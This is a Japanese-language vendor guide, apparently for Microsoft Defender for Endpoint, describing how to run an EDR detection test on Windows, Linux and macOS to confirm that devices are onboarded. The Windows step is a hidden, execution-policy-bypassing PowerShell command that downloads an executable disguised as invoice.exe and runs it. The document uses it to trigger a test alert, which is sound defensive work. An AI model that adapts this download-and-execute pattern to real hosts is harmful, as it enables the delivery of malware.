デバイスのオンボードおよびレポート サービスを検証するための EDR 検出テスト

適用対象:

• Microsoft Defender for Endpoint Plan 2
• Microsoft Defender for Business

シナリオの要件とセットアップ

• Windows 11、Windows 10 バージョン 1709 ビルド 16273 以降、Windows 8.1、または Windows 7 SP1。
• Windows Server 2022、Windows Server 2019、Windows Server 2016、Windows Server 2012 R2、および Windows Server 2008 R2 SP1。
• Linux
• macOS
• Microsoft Defender for Endpoint
• Linux 用 Microsoft Defender for Endpoint

エンドポイントのエンドポイント検出と応答は、ほぼリアルタイムで実用的な高度な攻撃検出を提供します。 セキュリティ アナリストは、効率的にアラートの優先順位を設定し、違反の全容を可視化して、脅威に対処する対応策を講じることができます。

EDR 検出テストを実行して、デバイスが適切にオンボードされ、サービスに報告されていることを確認します。 新しくオンボードされたデバイスで次の手順を実行します。

Windows

1. コマンド プロンプト ウィンドウを開く

2. プロンプトで、次のコマンドをコピーして実行します。 [コマンド プロンプト] ウィンドウが自動的に閉じます。

   powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
   

3. 成功した場合、検出テストは完了としてマークされ、数分以内に新しいアラートが表示されます。

Linux

1. オンボードされた Linux サーバーに スクリプト ファイル をダウンロードする

curl -o ~/Downloads/MDE-Linux-EDR-DIY.zip -L https://aka.ms/MDE-Linux-EDR-DIY

2. zip を抽出する

unzip ~/Downloads/MDE-Linux-EDR-DIY.zip

3. 次のコマンドを実行して、スクリプトの実行可能なアクセス許可を付与します。

chmod +x ./mde_linux_edr_diy.sh

4. 次のコマンドを実行してスクリプトを実行します。

 ./mde_linux_edr_diy.sh

5. 数分後、Microsoft Defender XDRで検出を発生させる必要があります。 アラートの詳細、マシンのタイムラインを確認し、一般的な調査手順を実行します。

macOS

1. ブラウザーの Microsoft Edge for Mac または Safari で、https://aka.ms/mdatpmacosdiyから MDATP MacOS DIY.zip をダウンロードして抽出します。

   次のプロンプトが表示されます。

   "mdatpclientanalyzer.blob.core.windows.net" でダウンロードを許可しますか?
   [Web サイトの基本設定] でファイルをダウンロードできる Web サイトを変更できます。

2. [許可] をクリックします。

3. [ダウンロード] を開きます。

4. MDATP MacOS DIY を表示できる必要があります。

   ヒント

   MDATP MacOS DIY をダブルクリックすると、次のメッセージが表示されます。

   開発者が検証ツールにできないため、"MDATP MacOS DIY" を開くことができません。
   macOS は、このアプリがマルウェアから解放されていることを確認できません。
   [ごみ箱に移動][キャンセル]

5. [ キャンセル] をクリックします。

6. MDATP MacOS DIY を右クリックし、[開く] をクリックします。

   次のメッセージが表示されます。

   macOS は MDATP MacOS DIY の開発者を検証できません。 開いてよろしいですか?
   このアプリを開くと、コンピュータや個人情報をMacに害を与えたりプライバシーを侵害したりする可能性のあるマルウェアに公開できるシステムセキュリティをオーバーライドすることになります。

7. [ 開く] をクリックします。

   次のメッセージが表示されます。

   Microsoft Defender for Endpoint - macOS EDR DIY テスト ファイル
   対応するアラートは、MDATP ポータルで使用できます。

8. [ 開く] をクリックします。

   数分後に、 アラート macOS EDR テスト アラート が発生します。

9. Microsoft Defender ポータル (https://security.microsoft.com/) に移動します。

10. [アラート キュー] に移動します。

    

    macOS EDR テスト アラートには、重大度、カテゴリ、検出ソース、および折りたたまれたアクションのメニューが表示されます。

    アラートの詳細とデバイスのタイムラインを確認し、定期的な調査手順を実行します。

次の手順

アプリケーションの互換性やパフォーマンスに問題が発生している場合は、除外を追加することを検討してください。 詳細については、次の記事を参照してください。

• macOS でのMicrosoft Defender for Endpointの除外の構成と検証
• Microsoft Defender for Endpoint での誤検出/検出漏れに対処する
• 抑制ルールの管理
• 侵害のインジケーターを作成する (IoC)
• カスタム検出ルールを作成および管理する

また、「Microsoft Defender for Endpoint セキュリティ操作ガイド」も参照してください。